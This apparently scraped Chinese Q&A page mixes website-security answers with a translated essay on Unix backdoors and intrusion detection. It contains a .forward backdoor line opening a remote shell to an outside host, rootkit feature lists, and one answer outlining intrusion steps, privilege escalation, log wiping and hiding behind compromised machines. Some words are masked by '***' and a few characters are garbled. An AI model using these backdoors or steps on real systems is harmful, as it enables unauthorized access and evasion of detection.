本文目录一览:
如何检测网站漏洞和后门及如何预防攻击
如何知道您的网站有没有漏洞呢?近来很多网站受到了各种各样形式的攻击,黑客攻击和入侵的动机各不一样,黑客人攻击的目标也有不确定性,作为一家企业的网管、或CEO,您是否担心您的网站也遭受同样的命运呢?
普通的黑客主要通过上传漏洞、暴库、注入、旁注等几种方式入侵近7成网站的。当然,还有更高级别的入侵行为,有些黑客为寻找一个入侵点而跟进一个网站好几个月的情况也是有的。我们先重点看看这些容易被黑的网站。
1、上传漏洞
这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。
温馨提醒:
大多网站的程序都是在公有的程序基础上修改的,程序总会存在漏洞。聪明的网站管理员应该学会熟练的掌握以上工具,时常关注自己web程序最新的漏洞。并使用上述工具进行自我检测,以确保网站安全。
2、暴库:
许多站点有这个漏洞可以利用。非常危险!
温馨提醒:
数据库始终是黑客最感兴趣的东西。数据库安全性却不是每个程序员在编程的时候能全面考虑到的。应该在上线后,找专业的安全公司进行测试数据库渗透测试,以确保数据库安全。
3、注入漏洞:
这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。
温馨提醒:
大型公司的网站应该找懂安全编程的高级程序员来进行,并且开发上线后,应该请专业公司进行安全性测试。以确保程序安全、可靠!
4、旁注:
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等 *** 来入侵我们要入侵的站点。
温馨提醒:
大型公司的网站,更好可以自己拥有独立的服务器。并做好服务器安全设置,可利用禁用端口,限制登录IP,及时打好补丁等方式来保障服务器的安全。
所谓的后门入侵是什么?
什么是后门?
从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门.本文将讨论许多常见的后门及其检测 *** . 更多的焦点放在Unix系统的后门,同时讨论一些未来将会出现的Windows NT的后门. 本文将描述如何测定入侵者使用的 *** 这样的复杂内容和管理员如何防止入侵者重返的基础知识. 当管理员懂的一旦入侵者入侵后要制止他们是何等之难以后, 将更主动于预防之一次入侵. 本文试图涉及大量流行的初级和高级入侵者 *** 后门的手法, 但不会也不可能覆盖到所有可能的 *** .
大多数入侵者的后门实现以下二到三个目的:
即使管理员通过改变所有密码类似的 *** 来提高安全性,仍然能再次侵入. 使再次侵入被发现的可能性减至更低.大多数后门设法躲过日志, 大多数情况下即使入侵者正在使用系统也无法显示他已在线. 一些情况下, 如果入侵者认为管理员可能会检测到已经安装的后门, 他们以系统的 脆弱性作为唯一的后门, 重而反复攻破机器. 这也不会引起管理员的注意. 所以在 这样的情况下,一台机器的脆弱性是它唯一未被注意的后门.
密码破解后门
这是入侵者使用的最早也是最老的 *** , 它不仅可以获得对Unix机器的访问, 而且可以通过破解密码制造后门. 这就是破解口令薄弱的帐号. 以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门. 多数情况下, 入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些. 当管理员寻找口令薄弱的帐号是, 也不会发现这些密码已修改的帐号.因而管理员很难确定查封哪个帐号.
Rhosts + + 后门
在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证 *** . 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管
理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现.
校验和及时间戳后门
早期,许多入侵者用自己的trojan程序替代二进制文件. 系统管理员便依*时间戳和系统校验和的程序辨别一个二进制文件是否已被改变, 如Unix里的sum程序. 入侵者又发展了使trojan文件和原文件时间戳同步的新技术. 它是这样实现的: 先将系统时钟拨回到原文件时间, 然后调整trojan文件的时间为系统时间. 一旦二进制trojan文件与原来的精确同步, 就可以把系统时间设回当前时间. sum程序是基于CRC校验, 很容易
骗过.入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序. MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过.
Login后门
在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号. 管理员注意到这种后门后, 便
用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露.入侵者就开始加密或者更好的隐藏口令, 使strings命令失效. 所以更多的管理员是用MD5校验和检测这种后门的.
Telnetd后门
当用户telnet到系统, 监听端口的inetd服务接受连接随后递给in.telnetd,由它运行login.一些入侵者知道管理员会检查login是否被修改, 就着手修改in.telnetd.在in.telnetd内部有一些对用户信息的检验, 比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门, 当终端设置为"letmein"时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门, 对来自特定源端口的连接产
生一个shell .
服务后门
几乎所有 *** 服务曾被入侵者作过后门. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本随处多是. 有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问.这些程序有时用刺娲□?ucp这样不用的服务,或者被加入inetd.conf作为一个新的服务.管理员应该非常注意那些服务正在运行, 并用MD5对原服务程序做校验.
Cronjob后门
Unix上的Cronjob可以按时间表调度特定程序的运行. 入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问. 也可以查看cronjob中经常运行的合法程序,同时置入后门.
库后门
几乎所有的UNIX系统使用共享库. 共享库用于相同函数的重用而减少代码长度. 一些入侵者在象crypt.c和_crypt.c这些函数里作了后门. 象login.c这样的程序调用了crypt(),当使用后门口令时产生一个shell. 因此, 即使管理员用MD5检查login程序,仍然能产生一个后门函数.而且许多管理员并不会检查库是否被做了后门.对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验. 有一种办法是入侵者对open()和文件访问函数做后门. 后门函数读原文件但执行trojan后门程序. 所以 当MD5读这些文件时,校验和一切正常. 但当系统运行时将执行trojan版本的. 即使trojan库本身也可躲过MD5校验. 对于管理员来说有一种 *** 可以找到后门, 就是静态编连MD5校验程序然后运行.静态连接程序不会使用trojan共享库.
内核后门
内核是Unix工作的核心. 用于库躲过MD5校验的 *** 同样适用于内核级别,甚至连静态连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的, 所幸的是内核的后门程序还不是随手可得, 每人知道它事实上传播有多广.
文件系统后门
入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现. 入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等. 有时为了防止管理员发现这么大的文件, 入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件.在很低的级别, 入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区. 因此入侵者只能用特别的工具访问这些隐藏的文件. 对于普通的
管理员来说, 很难发现这些"坏扇区"里的文件系统, 而它又确实存在.
Boot块后门
在PC世界里,许多病毒藏匿与根区, 而杀病毒软件就是检查根区是否被改变. Unix下,多数管理员没有检查根区的软件, 所以一些入侵者将一些后门留在根区.
隐匿进程后门
入侵者通常想隐匿他们运行的程序. 这样的程序一般是口令破解程序和监听程序 (sniffer).有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[]使它看起来象其他进程名. 可以将sniffer程序改名类似in.syslog再执行. 因此当管理员用"ps"检查运行进程时, 出现 的是标准服务名. 可以修改库函数致使
"ps"不能显示所有进程. 可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现. 使用这个技术的一个后门例子是amod.tar.gz :
也可以修改内核隐匿进程.
Rootkit
更流行的后门安装包之一是rootkit. 它很容易用web搜索器找到.从Rootkit的README里,可以找到一些典型的文件:
z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.
*** 通行后门
入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的 *** 通行. 这些 *** 通行后门有时允许入侵者通过防火墙进行访问. 有许多 *** 后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问. 因为这是通过非标准 *** 端口的通行, 管理员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报文.
TCP Shell 后门
入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉. 通常这些后门可以让入侵者躲过TCP Wrapper技术. 这些后门可以放在 *** TP端口, 许多防火墙允许e-mail通行的.
UDP Shell 后门
管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接, 所以netstat不能显示入侵者的访问痕迹. 许多防火墙设置成允许类似DNS的UDP报文的通行. 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙.
ICMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.
加密连接
管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给 *** 通行后门加密后,就不可能被判定两台机器间的传输内容了.
Windows NT
由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自Unix的 *** 攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序. 通过 *** 通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Network Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT. 此处该如何翻译? :(
解决
当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀.
评估
首先要做的是积极准确的估计你的 *** 的脆弱性, 从而判定漏洞的存在且修复之.许多商业工具用来帮助扫描和查核 *** 及系统的漏洞. 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性.
MD5基准线
一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前由干净系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了.一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.
入侵检测
随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要.以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和 *** 通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.
从CD-ROM启动
一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种 *** 的问题是实现的费用和时间够企业面临的.
警告
由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention. 此句该如何翻译? :( )
-------------------------------------------------------------------------
you may want to add:
.forward Backdoor
On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).
PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
nbs
the client and server).
Using *** rsh can effectively negate this backdoor (although it's quite
possibly still a problem if you allow things like elm's filter or
procmail which can run programs themselves...).
你也许要增加:
.forward后门
Unix下在.forward文件里放入命令是重新获得访问的常用 *** . 帐户'username'的.forward可能设置如下:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"
这种 *** 的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用 *** rsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或 procmail类程序, 很有可能还有问题 ......)
参考资料:zhidao.baidu.com
入侵网站需要什么步骤
嗯....不知道你要干什么,希望你不要干坏事。
之一步:情报收集与分析
用扫面器或者人工的对服务器的状态进行探知,获得以下信息: 服务器类型(大致分为windows服务器和linux服务器)、服务器版本、服务器的 *** 布局(自己与网站服务器的相对 *** 位置,是否有防火墙,不过现在的服务器一般都在防火墙后面)、服务器上开启的端口号、服务器上运行的服务及其版本、网站的网页脚本类型、脚本版本等等。最后根据以上信息判断该服务器可能存在的漏洞,这将是下一步的基础。
第二步:攻击开始
根据上一步收集到的漏洞信息开始对网站服务器发动攻击。一般是登陆服务器上开启的服务并猜测该服务的密码(弱口令攻击,现在基本失效)如果猜对便可以根据服务获得相应的服务器操作权限,如果运气好,这里就可以直接拿下服务器。或者根据服务器上运行的服务所存在的溢出漏洞进行溢出攻击(不过,溢出漏洞并不好找)。或者跟据网页脚本上的漏洞进行网页渗透。
第二步的主要目的就是为了获得一个可以在目标服务器上执行一定命令的权限,这也是最难的一步。
第三步:权限提升
如果只是为了从服务器上拿些东西,或者修改服务器上的一些文件,利用第二步获得权限可能已经足够,但是如果遇到细心的管理员进行了严格的权限管理,或者想完全控制服务器还需要提权操作。也就是利用第二步获得的权限获得跟高的服务器使用权限的操纵。其实现 *** 根据不同的入侵路径,会很多。这里只提一下大概思路,windows服务器:获得服务器系统盘的读写权(有时可以跳过)、获得system权限、建立自己的隐藏管理员用户、留下后门或木马。linux:获得root权限、留下后门。
最后就是清理自己的脚步,删除或者修改服务器上的日志文件,不然管理员会很容易察觉到被入侵。
网站入侵的形式其实很多,上面只是较为常用的形式而已。其他的还有 中间人攻击 社会工程学攻击等等。
以上只是个人的见解,希望能帮到你......
如何入侵网站不被发现ip
入侵者如果使用一台自己的电脑,那么服务器就会留下侵入后的历史记录。
MAC地址,MAC(Media Access Control, 介质访问控制)MAC地址是烧录在Network Interface Card(网卡,NIC)里的.MAC地址,也叫硬件地址,它存储的是传输数据时真正赖以标识发出数据的电脑和接收数据的主机的地址。
也就是说,在 *** 底层的物理传输过程中,是通过物理地址来识别主机的,它一般也是全球唯一的。因此黑客通常不用自己的电脑而是通过控制其他电脑来攻击。
典型的比如DDOS,控制大规模的傀儡机去攻击服务器,导致网站的服务器瘫痪。
楼主不用肉鸡做跳板,不能说一定被抓到,但危险系数绝对大的多。
打个比方2台电脑,一台是被黑客控制的肉鸡,一台是黑客的电脑。如果黑客攻击一个网站的服务器,那么就留在网站自己的mac地址了。网警通过连接服务器的电脑地址排查就能找到黑客。肉鸡的作用就显现出来了。因为连接肉鸡的电脑又有很多,巨大的工作量会让网警头痛的。
楼主用自己的电脑攻击,首先要找到网站的漏洞,编写程序注入漏洞才能获得网站后台管理权限。你可以涂改网页啊什么的。。。 厉害的黑客通常在攻击后清除掉自己的侵入痕迹,网站日志。并且留下后门为自己下次侵入提供便利。不用肉鸡隐藏入侵者的IP、MAC?这不是说上网裸奔而不让别人看见吗???
网友说用VPN可以,呵呵,那只是片面的。一样可以查得到
浩方就是虚拟专用 *** 。你登入后它只不过给你提供一个它专用 *** 的局域网IP。然后你用这个IP去侵入别人电脑,然后网警再来找这个提供VPN的服务商查你的真实ip,不是一下就搞定你了!
据我所知最近不是有个20几岁的黑客入侵地震网,修改主页后被抓了吗?楼主小心呵!
如何进入网站后台
可以按照如下方式进行操作:
进入网站的后台之一步你要找到网站的后台地址。找到网站后台地址后,一般都要输入用户名和密码。当用户名和密码正确之后就能进入网站后台。你可以问问之前管理这个网站的人,也可以问做网站的人设定的用户名和密码。具体如下:
1、首先要进入到自己的网站后台.你必须知道自己的网站登录名称和密码,如下图中所表示。
2、第二点是自己建的网站,自己应该知道自己网站的域名,也就是网址。类似下图这样的网址。下面就教大家进入后台的步骤,如下图中所表示。
3、点开自己的网址,再网址的后面加上 /wp-admin/ 我的网址是用的WORDPRESS建的站.所以前面的WP可能就是WORDPRESS的缩写.后面的admin都是通用的。后台都是admin.在相应的位置输入账户名称和密码,如下图中所表示。
4、跳转到这个页面就到了后台了。需要怎么设置和更新可以自己在这个页面对网站进行调整,如下图中所表示。
网站被入侵后如何解决
怎么及时地发现黑客的入侵,找到入侵者并采取有效的解决措施是非常关键的。 如何发现入侵者 系统被入侵而全无知晓恐怕是最糟糕的事情了,下面就将以UNIX系统为例告诉你如何在分析 *** 异常现象的基础上确定你的 *** 系统是否有入侵者。 异常的访问日志 入侵者在入侵并控制系统之前,往往会用扫描工具或者手动扫描的 *** 来探测系统,以获取更多的信息。而这种扫描行为都会被系统服务日志记录下来。比如:一个IP连续多次出现在系统的各种服务日志中,并试图越漏洞;又如一个IP连续多次在同一系统多个服务建立了空连接,这很有可能是入侵者在搜集某个服务的版本信息。 注意!在 UNIX 操作系统中如果有人访问了系统不必要的服务或者有严重安全隐患的服务比如:finger、rpc;或者在 Telnet、FTP、POP3 等服务日志中连续出现了大量的连续性失败登录记录,则很有可能是入侵者在尝试猜测系统的密码。这些都是攻击的前兆! *** 流量增大 如果发现服务器的访问流量突然间增大了许多,这就预示着你的系统有可能已经被入侵者控制,并被入侵用来扫描和攻击其他的服务器。事实证明,许多入侵者都是利用中介主机对远程主机进行扫描并找出安全漏洞,然后再进行攻击的。而这些行为都会造成 *** 流量突然增大。 非法访问 如果你发现某个用户试图访问控制并修改/etc/shadow、系统日志和系统配置文件,那么很有可能这个用户已经被入侵者控制,并且试图夺取更高的权限。 正常服务终止 比如系统的日志服务突然奇怪的停掉,或你的IDS程序突然终止,这都暗示着入侵者试图要停掉这些有威胁的服务,以避免在系统日志上留下“痕迹”。 可疑的进程或非法服务的出现 系统中任何可疑的进程都应该仔细检查,比如以root启动的http服务,或系统中本来关闭的服务又重新被启动。这些可疑进程和服务都有可能是入侵者启动的攻击进程、后门进程或Sniffer进程。 系统文件或用户 者通常会更改系统中的配置文件来逃避追查,或者加载后门、攻击程序之类的软件以方便下次进入。比如对于UNIX而言,入侵者或修改syslog.conf文件以去掉secure的条目来躲避login后门的审计,或修改hosts.deny、hosts.allow来解除tcpwrapper对入侵者IP的过滤;甚至增加一个条目在rc.d里面,以便系统启动的时候同时启动后门程序。所以被非法修改的系统文件或莫明其妙地增加了一个用户等一些现象都意味着你的系统很可能被入侵者控制了。